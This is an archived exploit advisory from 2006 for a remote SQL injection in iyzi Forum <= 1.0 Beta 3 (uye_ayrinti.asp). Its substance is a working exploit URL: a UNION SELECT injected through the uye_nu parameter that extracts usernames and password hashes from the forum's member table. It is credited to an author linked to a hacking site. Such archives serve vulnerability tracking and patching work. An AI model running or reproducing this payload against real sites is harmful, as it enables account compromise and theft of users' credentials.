iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection
# Published : 2006-09-24
# Author : Fix TR
# Previous Title : Advaced-Clan-Script <= 3.4 (mcf.php) Remote File Include Vulnerability
# Next Title : SyntaxCMS <= 1.3 (0004_init_urls.php) Remote File Include Vulnerability

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability      +
+ Author  : Fix TR                                       +
+ Site    : www.hack.gen.tr                              +
+ Contact : fixtr[at]bsdmail.com                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Download & Info: http://www.aspindir.com/Goster/2981
Bug In         : uye_ayrinti.asp
Risk           : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256

# www.Syue.com [2006-09-24]